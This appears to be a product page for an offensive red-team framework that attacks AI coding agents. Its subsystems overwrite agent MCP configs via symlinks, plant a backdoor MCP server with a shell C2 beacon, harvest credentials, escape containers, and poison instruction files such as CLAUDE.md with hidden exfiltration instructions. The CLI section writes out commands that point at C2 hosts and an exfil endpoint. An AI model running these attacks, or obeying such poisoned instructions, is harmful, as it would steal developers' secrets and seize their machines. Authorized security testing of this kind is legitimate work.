T127 — L25 AI DEVELOPER TOOLCHAIN

Red Specter SPECTER CODEX

The AI coding agent exploitation engine. Every developer's trusted AI assistant — Claude Code, Cursor, Copilot, Codex CLI — is a privileged local process with filesystem access. CODEX turns that trust into a kill chain: SymJack RCE, persistent MCP backdoor, credential harvest, container escape.

261
Tests
8
Subsystems
3
CVEs
5
WMD Classes
VIEW ON GITHUB →

Why This Exists

AI coding agents are the most privileged software on a developer's machine. They read files, execute commands, clone repos, and load plugins — all with the developer's credentials. The attack surface is enormous and almost entirely unaudited.

SymJack (Adversa AI, May 2026): a symlink in the cloned workspace resolves to the agent's MCP config file when the agent issues a cp command. The config is overwritten with a malicious MCP server definition. On restart, the backdoor loads. Confirmed against Claude Code, Cursor, Copilot CLI, Kiro, Continue.dev, and OpenAI Codex CLI.

CODEX is the first offensive framework that treats AI coding agents as what they actually are: privileged local processes with root-equivalent file access to developer secrets.

CODEX requires authorization. INJECT gate for SymJack and RULES-INJECT. UNLEASHED gate + --confirm-destroy for HARVEST, BACKDOOR, and ESCAPE.

CVE Coverage

CVEComponentCVSSVector
SymJack-2026All AI coding agents9.1Symlink in workspace resolves to agent MCP config — overwritten on cp, malicious server loads on restart
CVE-2026-44115OpenClaw / coding agent shells8.8Unquoted heredocs expose env vars — HARVEST uses fallback chain: direct read_file, printenv, /proc/self/environ
CVE-2026-44112Agent MCP config reload8.4TOCTOU race condition in config reload allows secondary persistent config write

Academic Foundation

SymJack (Adversa AI, May 2026): Industry-first disclosure of symlink RCE in AI coding agents. Demonstrated against Claude Code, Cursor, Copilot CLI, Gemini CLI, Grok Build, OpenAI Codex CLI. Requires only repository clone — zero user interaction after cp.

MCP Protocol Threat Model (arXiv:2504.03767): Comprehensive analysis of Model Context Protocol attack surface — server hijack, tool poisoning, privilege escalation via auto-loaded MCP servers.

OWASP MCP Top 10 2026 — MCP-07: Dynamic Server Loading — untrusted repositories can supply malicious MCP server definitions that load automatically on agent startup.

MITRE ATT&CK: T1574.010 (Symlink MCP overwrite), T1552.001 (Credentials in Files), T1547 (Boot/Logon Autostart via MCP), T1611 (Container Escape via Docker socket).

Subsystems

ENUMERATE OPEN

Detect AI coding agents in workspace. Scan config dirs, instruction files, MCP configs. Check MCP enabled status. Calculate attack surface score (0–100). Map SymJack traversal depth per agent.

SYMJACK INJECT

Create per-agent symlink RCE payloads in staging directory. Symlink resolves to agent's home MCP config. Malicious config deploys devtools-helper MCP server. Verified resolution via Path.resolve(). C2 callback on agent restart.

RULES-INJECT INJECT

Poison CLAUDE.md, .cursorrules, copilot-instructions.md, .kiro/steering, .continuerules, AGENTS.md with persistent exfil instructions. Unicode zero-width character obfuscation. Idempotent — no double-injection. Survives project reload.

HARVEST UNLEASHED + --confirm-destroy

Shannon entropy scan (threshold 3.5) + 15 regex patterns across 16 home credential files and workspace .env files. Anthropic/OpenAI/AWS/GitHub/Google/Stripe/JWT/private key detection. Shell history archaeology. Env var sweep. CVSS scores per credential.

BACKDOOR UNLEASHED + --confirm-destroy

Plant devtools-helper MCP server (MCP 2024-11-05, stdio JSON-RPC 2.0) into all detected agent configs. Tools: shell_exec (subprocess C2 beacon), read_project_config (credential harvest), persist. TOCTOU secondary config write for race-condition persistence.

ESCAPE UNLEASHED + --confirm-destroy

Detect container runtime (/.dockerenv, cgroups, env vars). Enumerate Docker socket accessibility. Check docker group membership. Scan MCP configs for shell/docker tool grants. Active escape only if socket accessible AND docker tool confirmed in MCP config.

ENGAGE INJECT

Full automated pipeline: ENUMERATE → SYMJACK → RULES-INJECT → (UNLEASHED) HARVEST → BACKDOOR → ESCAPE. Single command from workspace to full compromise. CDX-signed JSON report.

REPORT OPEN

CDX-{hex12} Ed25519-signed WARLORD-compatible JSON. Vulnerability matrix per agent. MITRE ATT&CK + ATLAS mapping. Remediation roadmap. Mermaid attack flow diagram. Full evidence chain.

CLI Usage

export CODEX_INJECT_TOKEN=$(openssl rand -hex 32)
export CODEX_UNLEASHED_TOKEN=$(openssl rand -hex 32)

# Enumerate coding agents in workspace
specter-codex enumerate --workspace ./target-repo

# Create SymJack payloads (attacker places file, victim runs cp)
specter-codex symjack --session CDX-XXXX --c2-host 10.0.0.1 --c2-port 4444

# Poison instruction files
specter-codex rules-inject --session CDX-XXXX --exfil-endpoint http://c2.example.com/x

# Harvest credentials (UNLEASHED)
specter-codex harvest --session CDX-XXXX --confirm-destroy

# Plant persistent MCP backdoor (UNLEASHED)
specter-codex backdoor --session CDX-XXXX --c2-host 10.0.0.1 --confirm-destroy

# Enumerate container escape paths (UNLEASHED)
specter-codex escape --session CDX-XXXX --confirm-destroy

# Full automated engagement
specter-codex engage --workspace ./target-repo \
  --c2-host 10.0.0.1 --unleashed --confirm-destroy

Agent Coverage

All six major AI coding agents confirmed:

WMD Classes

Differs From Existing Tools

T33 SPECTER MIMIC — injects into IDE rules files to steer model output (what the agent says). CODEX exploits the coding agent as a privileged local process with filesystem access — symlinks, config overwrites, MCP server loading, shell tool abuse. Different attack surface entirely.

T27 LEVIATHAN / T35 VECTOR / T61 ROGUE — attack MCP servers from the client or server side (protocol-level). CODEX plants a new MCP server via filesystem symlink attack, targeting the agent config before it loads.

T88 SPECTER SHADOW — persistent prompt injection via web content. CODEX operates entirely locally — no web request needed. Targets developer machines, not deployed AI services.